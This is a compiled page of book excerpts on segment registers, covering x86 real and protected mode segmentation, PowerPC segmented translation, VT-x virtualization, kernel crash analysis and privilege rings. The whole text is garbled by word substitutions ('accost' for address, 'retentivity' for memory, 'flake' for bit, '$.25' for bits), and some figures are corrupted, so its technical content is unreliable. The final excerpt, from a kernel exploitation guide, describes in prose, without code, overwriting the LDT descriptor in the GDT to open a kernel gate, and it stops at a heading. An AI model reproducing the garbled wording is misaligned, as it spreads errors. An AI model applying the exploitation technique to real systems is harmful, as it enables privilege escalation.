Segment Register

OVERVIEW: On Memory Systems and Their Design

Bruce Jacob , ... David T. Wang , in Memory Systems, 2008

PowerPC Segmented Translation

The IBM 801 introduced a segmented design that persisted through the POWER and PowerPC architectures [Chang & Mergen 1988, IBM & Motorola 1993, May et al. 1994, Weiss & Smith 1994]. It is illustrated in Effigy Ov.26. Applications generate 32-bit "effective" addresses that are mapped onto a larger "virtual" address space at the granularity of segments, 256-MB virtual regions. Sixteen segments incorporate an application's address space. The top four bits of the effective address select a segment identifier from a set of 16 registers. This segment ID is concatenated with the bottom 28 bits of the effective accost to form an extended virtual address. This extended address is used in the TLB and page table. The operating organization performs data movement and relocation at the granularity of pages, non segments.

FIGURE Ov.26. PowerPC segmented accost translation. Processes generate 32-fleck effective addresses that are mapped onto a 52-flake address space via 16 segment registers, using the top 4 bits of the effective address every bit an alphabetize. Information technology is this extended virtual address that is mapped by the TLB and folio table. The segments provide accost space protection and can be used for shared memory.

The architecture does non apply explicit address-infinite identifiers; the segment registers ensure accost space protection. If two processes duplicate an identifier in their segment registers, they share that virtual segment by definition. Similarly, protection is guaranteed if identifiers are not duplicated. If memory is shared through global addresses, the TLB and cache need not be flushed on context switch x considering the system behaves like a single address space operating organisation. For more details, see Chapter 31, Department 31.ane.7, Perspective: Segmented Addressing Solves the Synonym Problem.

Read full affiliate

URL:

https://world wide web.sciencedirect.com/science/article/pii/B9780123797513500023

The PC

Howard Austerlitz , in Data Acquisition Techniques Using PCs (2d Edition), 2003

5.ane.i Retention Segmentation

One idiosyncrasy of the xvi-flake processors in this Intel CPU family is the way 20-bit physical addresses are generated from xvi-bit registers. Intel uses an approach called sectionalization. A special segment register specifies which 64-Kbyte section of the i-Mbyte address space is being accessed by another 16-flake register. A segment register changes the memory address accessed by sixteen bits at a time, because its value is shifted left by 4 bits (or multiplied by sixteen) to embrace the entire 20-scrap address space. The segment register value is added to the addressing register's 16-chip value to produce the bodily 20-bit retentivity accost. 4 segment registers and five addressing registers are available in an 8088, all 16 bits wide.

For example, when the stack is accessed, the 16-fleck value in the Stack Segment (SS) register is shifted left by four bits (to produce a twenty-chip value) and added to the 16-bit Stack Pointer (SP) annals to get the full xx-bit physical address of the stack. The value added to the segment is referred to every bit the showtime. The usual notation is segment:offset. And so, if the lawmaking segment (CS) independent B021h and the pedagogy pointer (IP) contained 12C4h, the segmented notation is B021:12C4 and the physical location addressed would be B14D4h.

Note that throughout this book, virtually addresses will be presented in hexadecimal (base of operations 16) notation (with digits 0–9, A–F) using a trailing h. For case, 100h = 256 (decimal).

Read full chapter

URL:

https://www.sciencedirect.com/science/article/pii/B978012068377250005X

Embedded Software

Colin Walls , in Embedded Software (Second Edition), 2012

1.3.3 Segmented Retentiveness

A perceived drawback of flat retention is the limitation in size, determined past the discussion length. A 16-bit CPU could only have 64   K of memory and a 32-bit compages may exist considered overkill for many applications. The most common solution is to use segmented memory (see Effigy i.three). Examples of fries applying this scheme are the Intel 8086 and the Hitachi H8/500.

The idea of segmented memory addressing is fairly simple. Addresses are divided into 2 parts: a segment number and an offset. Offsets (commonly 16 bits) are used most of the time, where the additional high-guild bits are held in one or more than special segment registers and assumed for all operations. To address some memory over a longer range, the segment registers must exist reloaded with a new value. Typically, there are individual segment registers for lawmaking, information, and stack.

The use of segmented retentivity necessitates the introduction of the concepts of "near" and "far" code and information. A nearly object may exist accessed using the current segment register settings, which is fast; a far object requires a change to the relevant register, which is slower. Since segmented memory is not immediately accommodated by high-level languages, nigh and far (or _near and _far) keywords must be introduced. With these keywords, you lot can specify the addressing mode used to admission a code or data item. Using a "retentiveness model," yous can specify default modes. For example, a "big" model would admission all objects as "far," and a "small" model would utilize "well-nigh" for everything. With segmented retentiveness, the size of individual objects (e.g., modules or data arrays) is generally limited to the range addressable without changing the segment register (typically 64   K).

Compilers for fries with segmented retention typically implement a wide range of memory models and the far and near keywords.

Read full chapter

URL:

https://www.sciencedirect.com/science/article/pii/B9780124158221000015

Associates language

A.C. Fischer-Cripps , in Newnes Interfacing Companion, 2002

2.three.10 Retentiveness addressing

If an operand is stored in retention, then the CPU must calculate the actual physical address from which to read or write the data. The physical accost is formed from a segment base of operations address and an get-go. The offset is referred to as an effective address . The segment base of operations accost can exist the contents of whatever of the segment registers. The constructive address can be formulated in a variety of ways. In full general, the effective address is formed from:

EA = base + index + deportation

The actual physical accost is thus:

In direct retention addressing, data about the address is given in the instruction straight. An example is:

MOV AX,[0A4 0H]

This example says to move the contents of retention location with offset 0A40 into the AX register. At that place are several points about this case that require attention. First, there is no segment base address specified in the operand. If this is the case, and then the contents of DS are assumed to be the desired segment base of operations address. Second, AX is sixteen $.25 wide, and so a word is moved from the offset and starting time+one with the msb of the AX register receiving the data at offset+one.

The general format for direct retentivity addressing is: DS:[straight address]

Size codes

There are no explicit size codes used in 8086 associates language instructions. The size code is taken from the size of the operands. For example, in the MOV instruction, moving data into or out from a segment register is always a word (2-byte) functioning. Moving data into or out from AL would be a byte functioning since AL is 8 bits wide.

Read full affiliate

URL:

https://www.sciencedirect.com/science/article/pii/B9780750657204501108

Early Intel® Architecture

In Power and Performance, 2015

ane.three.2 Protected Mode Segmentation

Support for these memory protected regions meant that the current segmentation memory model had to be extended. Originally, segments had been fixed in size; all the same, that made retention protection more cumbersome, since the stock-still sizes were also large for fine grained job command. In lodge to solve this, segments in protected fashion were now of variable size. All of these changes, combined with additional changes designed to allow for the implementation of avant-garde features, such as swapping, merely wouldn't work within the confines of the existing segment annals format. To arrange this, the segment register format and behavior in protected style is completely different from the segment register format and beliefs in existent mode.

Remember that originally the segment registers but contained a base address that was shifted and added to the offset to produce a larger address size. In this new model, the segment registers needed more room for the accounting required to support these new features. Therefore, in protected mode simply, segments at present didn't reference the base address of the segment, just instead pointed to a descriptor entry in a table of segment descriptors. Each eight-byte entry in this table describes the 24-fleck base of operations address, 16-fleck size, and 8 bits for the privilege and admission information, which is used for marking segments every bit read simply, executable, then on. The remaining xvi bits store the segment selector, which when loaded into the 16-bit segment register effectively load the segment. To improve functioning, by avoiding the need to touch memory each time a segment functioning needs to exist checked, the other 48 $.25 of the segment descriptor are cached in a hidden register when the segment selector is loaded.

In order to make segmentation usable for both the operating system and user applications while nonetheless enforcing memory protections, two segment descriptor tables be. The global descriptor tabular array (GDT) is a table of segment descriptors that the operating arrangement, privilege level 0, controls, while the local descriptor tabular array (LDT) is controlled by the user application. Ii registers, the GDTR and LDTR, exist for storing the base address of these tables. The global and local descriptor registers are loaded and stored with the LGDT and SGDT, and LLDT and SLDT instructions, respectively. Each segment selector has a special scrap indicating whether the descriptor is located in the local or global table.

Each segment descriptor as well had a present fleck, indicating whether the corresponding segment was currently loaded into retentiveness. If the segment descriptor was loaded into a segment selector register and the present bit in the descriptor was not set up, the user program would be paused and an exception would be raised, giving the operating organization a chance to load the relevant segment into retentiveness from deejay. One time the segment had been loaded, the user program would exist resumed. All of this occurred transparently to the user program, and thus provided an early form of hardware supported virtual memory swapping. With swapping, more virtual memory could be allocated by the operating system than was physically available on the calculator.

Read total affiliate

URL:

https://world wide web.sciencedirect.com/science/article/pii/B978012800726600001X

Cloud Resource Virtualization

Dan C. Marinescu , in Cloud Computing (Second Edition), 2018

10.4 Hardware Back up for Virtualization

In early 2000 it became obvious that hardware support for virtualization was necessary and Intel and AMD started working on the showtime generation virtualization extensions of the x86 3 architecture. In 2005 Intel released two Pentium 4 models supporting VT-x and in 2006 AMD appear Pacifica and then several Athlon 64 models.

The Virtual Motorcar Extension (VMX) was introduced by Intel in 2006 and AMD responded with the Secure Virtual Machine (SVM) instruction set extension. The Virtual Machine Control Structure (VMCS) of VMX tracks the host state and the guest VMs as control is transferred between them. Iii types of data are stored in VMCS:

Guest state. Holds virtualized CPU registers (e.g., control registers or segment registers) automatically loaded by the CPU when switching from kernel mode to guest mode on VMEntry.

Host state. Data used by the CPU to restore annals values when switching back from invitee mode to kernel mode on VMExit.

Control data. Data used by the hypervisor to inject events such as exceptions or interrupts into VMs and to specify which events should cause a VMExit; it is likewise used by the CPU to specify the VMExit reason.

VMCS is shadowed in hardware to overcome the functioning penalties of nested hypervisors discussed in Section 10.8. This allows the invitee hypervisor to access VMCS directly, without disrupting the root hypervisor in case of nested virtualization. VMCS shadow access is most as fast as a non-nested hypervisor surroundings. VMX includes several instructions [250]:

1.

VMXON – enter VMX operation;

two.

VMXOFF – leave VMX functioning;

3.

VMREAD – read from the VMCS;

iv.

VMWRITE – write to the VMCS;

5.

VMCLEAR – clear VMCS;

6.

VMPTRLD – load VMCS pointer;

7.

VMPTRST – store VMCS pointer;

8.

VMLAUNCH/VMRESUME – launch or resume a VM; and

9.

VMCALL – call to the hypervisor.

A 2006 paper [356] analyzes the challenges to virtualizing Intel architectures and and so presents VT-ten and VT-i virtualization architectures for x86 and Itanium architectures, respectively. Software solutions at that time addressed some of the challenges, but hardware solution could improve non only performance but also security and, at the aforementioned time simplify the software systems. The problems faced by virtualization of the x86 architecture are:

Band deprivileging. This ways that a hypervisor forces a guest VM including an Bone and an application, to run at a privilege level greater than 0. Call back that the x86 architecture provides 4 protection rings, 0–iii. 2 solutions are then possible:

1.

The ( 0 / i / 3 ) mode when the hypervisor, the guest OS, and the application run at privilege levels 0 , ane , and three, respectively; this way is not feasible for x86 processors in 64-flake manner, as we shall see before long.

2.

The ( 0 / three / 3 ) mode when the hypervisor, a guest Os, and applications run at privilege levels 0 , 3 and iii, respectively.

Band aliasing. Such problems are created where a invitee Os is forced to run at a privilege level other than that it was originally designed for. For case, when the CS annals four is PUSHed, the current privilege level in the CR is also stored on the stack [356].

Accost infinite compression. A hypervisor uses parts of the guest address infinite to store several system data structures such every bit the interrupt-descriptor table and the global-descriptor tabular array. Such data structures must be protected, but the guest software must have access to them.

Non-faulting access to privileged land. Several instructions, LGDT, SIDT, SLDT, and LTR which load the registers GDTR, IDTR, LDTR, and TR, tin only be executed by software running at privileged level 0 because these instructions indicate to data structures that control the CPU functioning. Nonetheless, instructions that shop these registers fail silently when executed at a privilege level other than 0. This implies that a guest Bone executing one of these instructions does not realize that the instruction has failed.

Invitee organization calls. Two instructions, SYSENTER and SYSEXIT support depression-latency system calls. The first causes a transition to privilege level 0, while the 2nd causes a transition from privilege level 0 and fails if executed at a level higher than 0. The hypervisor must then emulate every guest execution of either of these instructions and that has a negative impact on performance.

Interrupt virtualization. In response to a concrete interrupt the hypervisor generates a "virtual interrupt" and delivers it later to the target guest OS. But every Os has the ability to mask interrupts, 5 thus the virtual interrupt could merely be delivered to the guest Bone when the interrupt is not masked. Keeping track of all invitee OS attempts to mask interrupts greatly complicates the hypervisor and increases the overhead.

Access to hidden state. Elements of the system state, east.g., descriptor caches for segment registers, are subconscious; at that place is no machinery for saving and restoring the hidden components when at that place is a context switch from one VM to some other.

Ring compression. Paging and sectionalisation are the two mechanisms to protect hypervisor code from being overwritten past invitee Os and applications. Systems running in 64-bit manner can merely use paging, just paging does not distinguish between privilege levels 0, 1, and ii, thus the guest OS must run at privilege level 3, the so chosen ( 0 / three / three ) manner. Privilege levels 1 and 2 cannot be used thus, the proper noun band pinch.

Frequent access to privileged resources increases hypervisor overhead. The task-priority register (TPR) is frequently used past a guest Bone; the hypervisor must protect the access to this register and trap all attempts to access information technology. That can cause a meaning performance degradation.

Similar problems exist for the Itanium architecture discussed in Section 10.10.

A major architectural enhancement provided by the VT-x is the support for 2 modes of functioning and a new data construction, VMCS, including host-state and invitee-state areas, see Figure 10.3:

Figure 10.3

Figure 10.3. (A) The 2 modes of functioning of VT-x, and the two operations to transit from one to another; (B) VMCS includes host-land and invitee-state areas which command the VM entry and VM go out transitions.

VMX root: intended for hypervisor operations, and very close to the x86 without VT-x.

VMX non-root: intended to back up a VM.

When executing a VMEntry functioning the processor state is loaded from the guest-state of the VM scheduled to run; then the command is transferred from the hypervisor to the VM. A VMExit saves the processor land in the invitee-state surface area of the running VM; it loads the processor state from the host-state area, and finally transfers control to the hypervisor. All VMExit operations utilise a mutual entry indicate to the hypervisor.

Each VMExit performance saves in VMCS the reason for the exit and eventually some qualifications. Some of this information is stored as bitmaps. For example, the exception bitmap specifies which one of 32 possible exceptions acquired the exit. The I/O bitmap contains one entry for each port in a 16-bit I/O space.

The VMCS expanse is referenced with a physical address and its layout is not fixed by the architecture, but tin be optimized past a item implementation. The VMCS includes control bits that facilitate the implementation of virtual interrupts. For example, external-interrupt exiting, when prepare, causes the execution of a VM exit operation; moreover the invitee is non allowed to mask these interrupts. When the interrupt window exiting is set, a VM exit operation is triggered if the guest is ready to receive interrupts.

Processors based on two new virtualization architectures, VT-d vi and VT-c have been developed. The first supports the I/O Retentiveness Direction Unit (I/O MMU) virtualization and the 2d the network virtualization.

As well known as PCI laissez passer-through the I/O MMU virtualization gives VMs direct admission to peripheral devices. VT-d supports:

DMA address remapping, address translation for device DMA transfers.

Interrupt remapping, isolation of device interrupts and VM routing.

I/O device assignment, the devices can be assigned by an ambassador to a VM in whatsoever configuration.

Reliability features, it reports and records DMA and interrupt errors that may otherwise corrupt memory and bear on VM isolation.

Read full chapter

URL:

https://world wide web.sciencedirect.com/science/commodity/pii/B9780128128107000133

Getting very geeky – application and kernel cores, kernel debugger

Igor Ljubuncic , in Trouble-Solving in High Performance Computing, 2015

Commands and detailed usage

Earlier, nosotros learned about some basic commands. Information technology is time to put them to good utilize. The first control we want is bt - backtrace. Nosotros want to see the execution history of the offending process, backtrace.

We have much data hither, permit us kickoff digesting it slowly.

Phone call trace

The sequence of numbered lines, starting with the hash sign (#), is the telephone call trace. It is a list of kernel functions executed just before the crash. This gives us a good indication of what happened before the system went down.

Instruction pointer

The first really interesting line is this 1:

We accept exception RIP: default_idle + 61. What does this hateful? Let usa hash out RIP. The three-letter acronym stands for Render Instruction Pointer; in other words, information technology points to a retentivity address, indicating the progress of plan execution in memory. In our case, you tin can come across the exact accost in the line but below the bracketed exception line:

For now, the address itself is not important. Note: on 32-bit architecture, the instruction arrow is called EIP.

The second office of information is far more useful to us. The name of the kernel part in which the RIP lies is default_idle: +61 is the offset, in decimal format, inside the said role where the exception occurred. This is the actually important chip that we will use later in our analysis.

Code segment (CS) register

The code betwixt the bracketed string down to --- <exception stack> --- is the dumping of registers. Virtually are not useful to the states, except the CS register.

Again, we encounter a four-digit combination. In order to explain this concept, I need to digress a petty and talk near privilege levels.

Privilege levels

Privilege level is the concept of protecting resources on a CPU. Unlike execution threads tin take different privilege levels, which grant access to system resource, like memory regions, I/O ports, and so on. There are four levels, ranging from 0 to iii. Level 0 is the near privileged, known as Kernel mode. Level 3 is the least privileged, known equally User mode.

Most modern operating systems, including Linux, ignore the intermediate two levels, using merely 0 and iii. The levels are also known equally rings.

Current privilege level (CPL)

Code segment (CS) register is the one that points to a segment where program instructions are set up. The two least significant bits of this register specify the Current Privilege Level (CPL) of the CPU: two bits, meaning numbers between 0 and 3.

Descriptor privilege level (DPL) and requested privilege level (RPL)

Descriptor privilege level (DPL) is the highest level of privilege that tin can access the resource and is defined. This value is defined in the segment descriptor. Requested privilege level (RPL) is defined in the segment selector, the last two $.25. Mathematically, CPL is not allowed to exceed MAX(RPL,DPL), and if information technology does, this volition crusade a general protection fault. Now, why is all this important, you ask?

Well, for case, if you encounter a case where the system crashed while the CPL was 3, then this could indicate faulty hardware because the organization should not crash because of a problem in the User manner. Alternatively, at that place might be a problem with a buggy system call. These are just some rough examples. Now, let us continue analyzing our crash log:

Every bit we know, the 2 least significant bits specify the CPL. Two bits means four levels; even so, levels 1 and 2 are ignored. This leaves us with 0 and 3, the Kernel mode and User mode, respectively. Translated into binary format, we have 00 and 11.

The format used to nowadays the descriptor data can exist confusing, merely it is very simple. If the rightmost figure is even, then we are in the kernel style; if the concluding effigy is odd, then nosotros are in the user mode. Hence, we run across that CPL is 0, since the offending task leading to the crash was running in the kernel style. This is important to know. It may help the states sympathize the nature of our problem. Just for reference, here is an example where the crash occurred in User mode:

Back to our example, nosotros have learned many useful, of import details. We know the exact retentivity accost in which the instruction pointer was at the time of the crash. We know the privilege level.

More importantly, we know the name of the kernel function and the offset where the RIP was pointing at the fourth dimension of the crash. For all practical purposes, we just need to find the source file and examine the code. Of class, this may non exist always possible, for various reasons, merely we volition do that, nonetheless, as an practice.

And then, we know that the crash_nmi_callback() office was called past do_nmi(), do_nmi() was called by nmi(), and nmi() was called by default_idle(), which caused the crash. We can examine these functions and try to understand more deeply what they do. We will do that soon. Now, let the states revisit our Fedora example one more time.

Now that we sympathise what is incorrect, we tin take a look at the Fedora instance again and endeavour to empathise the trouble. We accept a crash in an untainted kernel, caused by the swapper procedure. The crash written report points to native_apic_write_dummy function.

Then, in that location is also a very long call trace, containing quite a bit of useful information that should assist us solve the problem. We volition see how we tin can use the crash reports to assist developers fix bugs and produce improve, more stable software. Now, let united states focus some more on crash and the basic commands.

Backtrace for all tasks

By default, crash will display backtrace for the active task. Merely you lot may also desire to come across the backtrace of all tasks. In this case, you will want to run foreach:

Dump system bulletin buffer

This control dumps the kernel log_buf content in a chronological lodge. The kernel log bugger (log_buf) might contain useful clues preceding the crash, which might assist us pinpoint the problem more easily and understand why our system went down.

The log command may not be really useful if you have intermittent hardware problems or purely software bugs, only it is definitely worth the effort. Hither are the last few lines of our crash log:

Or alternatively, a hardware-related issue

Brandish procedure condition data

This command displays process condition for selected, or all, processes in the system. If no arguments are entered, the process data is displayed for all processes.

The crash utility may load pointing to a chore that did not cause the panic or may not exist able to find the panic chore. There are no guarantees. If yous are using virtual machines, including VMware or Xen, then things might go even more complicated.

Using backtrace for all processes (with foreach) and running the ps command, you lot should be able to locate the offending process and examine its task.

Read full chapter

URL:

https://www.sciencedirect.com/scientific discipline/article/pii/B9780128010198000064

Introducing linux

Doug Abbott , in Linux for Embedded and Existent-Fourth dimension Applications (Fourth Edition), 2018

Protected Mode Compages

Earlier getting into the details of Linux, let's take a short detour into protected mode architecture. The implementation of protected fashion memory in contemporary Intel processors first made its advent in the 80386. It utilizes a full 32-fleck address for an addressable range of 4   GB. Access is controlled such that a block of retentiveness may exist: Executable, Read but, or Read/Write. Electric current Intel 64-bit processors implement a 48-bit address infinite.

The processor tin can operate in one of four Privilege Levels. A program running at the highest privilege level, level 0, can practise anything information technology wants—execute I/O instructions, enable and disable interrupts, alter descriptor tables. Lower privilege levels prevent programs from performing operations that might be "dangerous." A discussion processing application probably should non exist messing with interrupt flags, for example. That's the job of the operating system.

So application lawmaking typically runs at the lowest level, while the operating organisation runs at the highest level. Device drivers and other services may run at the intermediate levels. In practice, however, Linux and nigh other operating systems for Intel processors only use levels 0 and iii. In Linux, level 0 is chosen "Kernel Space" while level 3 is called "User Space."

Real Mode

To begin our give-and-take of protected manner programming in the x86, it's useful to review how "real" address way works.

Dorsum in the late 1970s, when Intel was designing the 8086, the designers faced the dilemma of how to access a megabyte of address space with only 16 $.25. At the time a megabyte was considered an immense amount of memory. The solution they came up with, for better or worse, builds a 20-flake (1 megabyte) address out of two 16-chip quantities called the Segment and Starting time. Shifting the segment value four bits to the left and adding it to the offset creates the 20-bit linear accost (meet Fig. 3.5).

Figure three.5. Existent fashion addressing.

The x86 processors accept four segment registers in real manner. Every reference to memory derives its segment value from 1 of these registers. By default, teaching execution is relative to the Code Segment (CS), about information references (MOV for example) are relative to the information segment (DS), and instructions that reference the stack are relative to the Stack Segment (SS). The Actress Segment is used in string move instructions, and can exist used whenever an extra DS is needed. The default segment option can be overridden with segment prefix instructions.

A segment can be up to 64 Kbytes long, and is aligned on sixteen-byte boundaries. Programs less than 64 Kbytes are inherently position-independent, and can be easily relocated anywhere in the 1 Mbyte address infinite. Programs larger than 64 Kbytes, either in lawmaking or data, crave multiple segments and must explicitly dispense the segment registers.

Protected Fashion

Protected mode still makes use of the segment registers, just instead of providing a slice of the address direct, the value in the segment register (now chosen the selector) becomes an index into a tabular array of Segment Descriptors. The segment descriptor fully describes a block of memory including, among other things, its base and limit (encounter Fig. 3.6). The linear address in physical retentiveness is computed by calculation the start in the logical address to the base contained in the descriptor. If the resulting address is greater than the limit specified in the descriptor, the processor signals a memory protection error.

Effigy 3.6. Protected mode addressing.

A descriptor is an 8-byte object that tells us everything we need to know about a block of memory.

Base Address[31:0]: Starting address for this block/segment.

Limit[nineteen:0]: Length of this segment. This may be either the length in bytes (upward to 1 Mbyte), or the length in 4 Kbyte pages. The estimation is defined by the Granularity fleck.

Type: A 4-bit field that defines the kind of memory that this segment describes

S   0=this descriptor describes a "System" segment. 1=this descriptor describes a code ordata segment.

DPL   Descriptor Privilege Level: A 2-flake field that defines the minimum privilege level required to access this segment.

P   Nowadays: 1=the block of memory represented by this descriptor is nowadays in retentivity. Used in paging.

Thou   Granularity: 0=Interpret Limit as bytes. ane=Interpret Limit as 4 Kbyte pages.

Note that, with the Granularity chip set up to 1, a single segment descriptor can represent the entire four Gbyte accost space.

Normal descriptors (Due south fleck=i) draw memory blocks representing data or code. The Type field is four $.25, where the most pregnant bit distinguishes between Code and Data segments. Code segments are executable, data segments are not. A CS may or may not as well be readable. A data segment may be writable. Whatever attempted access that falls outside the scope of the Type field—attempting to execute a data segment for example—causes a memory protection mistake.

"Flat" Versus Segmented Retentiveness Models

Because a single descriptor can reference the full 4 Gbyte address infinite, it is possible to build your organisation by reference to a single descriptor. This is known as "flat" model addressing and is, in effect, a 32-flake equivalent of the addressing model found in well-nigh viii-chip microcontrollers, also as the "tiny" memory model of DOS. All retention is every bit attainable, and there is no protection.

Linux actually does something like. It uses separate descriptors for the operating system and each process and then that protection is enforced, but it sets the base of operations address of every descriptor to zero. Thus, the beginning is the same as the virtual address. In upshot, this does away with division.

Paging

Paging is the mechanism that allows each task to pretend that it owns a very large apartment accost space. That infinite is then cleaved down into 4 Kbyte pages. Simply the pages currently being accessed are kept in main retention. The others reside on disk.

Every bit shown in Fig. 3.7, paging adds another level of indirection. The 32-bit linear address derived from the selector and offset is divided into three fields. The high-order 10 bits serve equally an index into the Folio Directory. The Folio Directory Entry points to a Folio Table. The adjacent x bits in the linear accost provide an index into that table. The Folio Table Entry (PTE) provides the base address of a 4 Kbyte page in physical memory called a Page Frame. The low order 12 bits of the original linear address supplies the offset into the page frame. Each task has its own Folio Directory pointed to by processor control annals CR3.

Figure three.7. Paging.

At either stage of this lookup process, it may turn out that either the Page Tabular array or the Folio Frame is not present in physical memory. This causes a Folio Mistake, which in plow causes the operating system to find the corresponding page on disk and load information technology into an available page in memory. This in plough may crave "swapping out" the folio that currently occupies that retention.

A further advantage to paging is that it allows multiple tasks or processes to hands share lawmaking and data by but mapping the appropriate sections of their individual accost spaces into the same physical pages.

Paging is optional, you lot don't have to apply it, although Linux does. Paging is controlled by a bit in processor register CR0.

Page Directory and Page Tabular array entries are each four bytes long, so the Folio Directory and Page Tables are a maximum of iv Kbytes, which also happens to be the Page Frame size. The high-lodge 20 bits point to the base of a Page Table or Folio Frame. Bits nine to 11 are bachelor to the operating system for its own use. Amid other things, these could exist used to betoken that a page is to be "locked" in retentiveness, i.east., not swappable.

Of the remaining control bits the most interesting are:

P   Present: 1=this page is in memory. If this bit is 0, referencing this Page Directory or PTE causes a page fault. Note that when P==0 the remainder of the entry is not relevant.

A   Accessed: one=this page has been read or written. Prepare by the processor but cleared by the Os. Past periodically immigration the Accessed $.25, the OS can decide which pages have non been referenced in a long time, and are therefore subject area to being swapped out.

D   Muddied: 1=this page has been written. Prepare past the processor merely cleared past the Bone. If a page has not been written to, in that location is no need to write information technology back to disk when it has to be swapped out.

64-Flake Paging

The paging model thus far described is for 32-bit x86 processors. It is described as a 10-10-12 model, because the 32-chip linear address is divided into three fields of, respectively, x bits, 10 bits, and 12 bits. In a 64-bit machine, entries in the Folio Directory and Page Table are eight bytes, so a 4   KB page holds 512 entries, or ix $.25. Current 64-fleck processors merely implement 48 bits of concrete addressing for a maximum of 256 TB of retentivity. Two more tiers of address translation are added to yield a 9-nine-nine-ix-12 model.

Read full chapter

URL:

https://www.sciencedirect.com/science/article/pii/B9780128112779000031

Hardware and Security

Gedare Bloom , ... Rahul Simha , in Handbook on Securing Cyber-Concrete Critical Infrastructure, 2012

Memory Protection in Article Systems

Consider an abstract computing device comprising two major components—the processor and retention. The processor fetches code and data from retentiveness to execute programs. If both components are shared by all programs then a program might decadent or steal another's information in retentivity, accidentally or maliciously, or prevent any other program from accessing the processor (deprival-of-service). To avoid such scenarios, a privileged entity must control the allocation (time and space) of compute resources (processor and retentiveness). Traditionally, the OS kernel is responsible for deciding how to allocate resource, and hardware enforces the kernel's decisions past supporting dissimilar privilege rings or levels (Figure 12-2).

Figure 12-2. Privilege rings (Levels). The innermost ring is the highest privilege at which software tin can execute, normally used by the OS or hypervisor. The outermost ring is the everyman privilege, normally used by application software. The centre rings (if they be) are architecture-specific and are often unused in practice.

By occupying the highest privilege ring, the kernel controls all compute resources. It can read and write from any memory location, execute whatsoever instruction supported by the processor, receive all hardware events, and operate all peripherals. User applications – residing in the lowest privilege level – have express access to memory (nowadays enforced through virtual retentivity), cannot execute privileged instructions, and tin just access peripherals by invoking OS services. A processor differentiates between kernel and user with bits in a special register, generically called the programme status word and specifically called the Program Condition Register in ARM architectures, Hypervisor State Bit in PowerPC architectures, Privileged Mode in the Processor Country Register in SPARC architectures, or Current Privilege Level in the Code Segment Annals in Intel architectures.

A hierarchy of control from the most to least privilege, combined with memory access controls, prevents user programs from performing any action outside a carefully sandboxed environment without invoking services (code) in a more than privileged level. Control transfer between different privilege rings ordinarily is washed with interrupts or specialized command instructions; on more contempo Intel architectures, the sysenter and sysexit instructions allow fast switching during system calls. The OS controls the information structures and policies that control high-level security concepts similar users and files, and code running outside the highest privileged ring cannot manipulate them directly. A critical attribute of securing high-level code and data is memory protection.

In simple architectures, the privileged state also defines memory separation. An example of a simple policy could be that user code can only access memory in a specified range such as 0xF000 to 0xFFFF, whereas privileged code tin admission the full memory range. With one or more than fixed memory partitions, privileged code can manage both the allocation and separation of retentiveness amid application tasks. Except for embedded and highly customized applications, static memory sectionalization is impractical.

A multiprocessing system comprising dynamic tasks, each with distinct (often statically unknown) retention and execution demands, require dynamic retentivity direction to limit memory fragmentation and balance resource utilization. Two practical solutions for dynamic memory direction are to use fixed sized blocks (pages) or variable length segments. With either solution, memory accesses must be translated to a physical address and verified for right access rights. Modernistic architectures usually provide some support for translation and verification of retentiveness accesses, whether for pages or segments.

Virtual retentivity with paging is the norm in dynamic memory management. Paging provides each awarding (procedure) with a linear face-to-face virtual address infinite. The physical location of data referenced by such an address is computed based on a translation table that the Bone maintains. The retentivity management unit of measurement (MMU) is a special hardware unit that helps to translate from virtual to physical addresses, with acceleration in the course of a hardware lookup tabular array chosen the translation look aside buffer (TLB) and aid in checking access permissions.

The Os maintains a page table for each virtual address space that contains entries of virtual-to-concrete pages. Each page table entry contains a couple of protection bits, which are compages-dependent and either one bit to distinguish between read/write permissions or two encoded $.25 (3 independent bits) for read/write/execute permissions. A procedure gains access to individual pages based on the permission $.25. Considering each process has a different folio table, the Bone can control how processes access memory by setting (clearing) permission $.25 or past non loading a mapping into the MMU. During a procedure context switch, nevertheless, the Bone must flush (invalidate) the hardware that accelerates translation (the translation lookaside buffer or TLB). So, hardware supports paging with protection bits, which generate an exception on invalid accesses and with the TLB for accelerating translations.

Although paged-based virtual memory systems allow for process isolation and controlled sharing, the granularity of permission is coarse – permissions can just be assigned to full pages, typically 4KB. An awarding that needs to isolate small chunks of memory must place each chunk in its ain page, leading to excessive internal fragmentation.

With segmentation, instead of one contiguous virtual address infinite per process, we can have multiple variable sized virtual spaces, each mapped, managed, and shared independently. Sectionalization-based addressing is a two step process involving awarding code and processor hardware: code loads a segment selector into a register and issues memory accesses, then, for each memory admission, the processor uses the selector as an index in a segment table, obtains a segment descriptor, and computes the access relative to the base address present in the segment descriptor. Access to the segment descriptor is restricted to high-privilege code.

Consider the Intel architecture as an example of sectionalization. It uses the code segment (CS) register as a segment selector and stores the current privilege level (CPL) as its 2 lower bits. When the executing lawmaking tries to access a data segment, the descriptor privilege level (DPL) is checked. Depending on whether the loaded segment is data, code, or a arrangement call, the check ensures the CPL allows loading the segment descriptor based on the DPL. For example, a data segment DPL specifies the highest privilege level (CPL) that a job can have in order to exist allowed access, so if DPL is 2 then access is granted only to tasks with CPL of 0, 1, or 2. A 3rd privilege level, the requested privilege level (RPL), is used when invoking OS services through telephone call gates and prevents less privileged applications from elevating privileges and gaining admission to restricted system segments.

Virtually open or commercial OSs ignore or brand limited utilize of division. OS/ii [55] is a modern commercial Os that uses the full features of division. Some virtualization techniques (such equally the VMWare ESX hypervisor) do reserve a segment for a resident memory area and rely on segment limit checks to grab illegal accesses.

Read total chapter

URL:

https://www.sciencedirect.com/science/commodity/pii/B9780124158153000121

Windows

Enrico Perla , Massimiliano Oldani , in A Guide to Kernel Exploitation, 2011

Overwriting Kernel Command Structures

Function pointers are not the only adept targets. We can overwrite any other kernel structure that modifies the user-state-to-kernel interface. Ane interesting mode to bargain with user-country-to-kernel interfaces (or gates) is to alter processor-related tables. As nosotros saw in Chapter 3, if we tin can alter the IDT, GDT, or the LDT, we can introduce a new "kernel gate." This section will show how to automatically overwrite the LDT descriptor within the GDT table, by redirecting the LDT tabular array in user land. This arroyo has been chosen amongst the others (eastward.thou., direct GDT/LDT modification) because in this scenario we are able to successfully exploit the arbitrary overwrite vulnerability by only patching 1 byte with partially controlled or uncontrolled data.

A similar technique has been used for ages past a few rootkits to locate organization-wide open file descriptors and to stealthily open a kernel gate, avoiding having to load drivers on demand. Equally mentioned before, we tin exploit a lot of different vectors and the ane shown side by side is simply one among many nosotros tin choose from. For example, the straight LDT overwrite vector, described recently by Jurczyk M and Coldwind G, 6 can also be used.

Leaking the KPROCESS Address

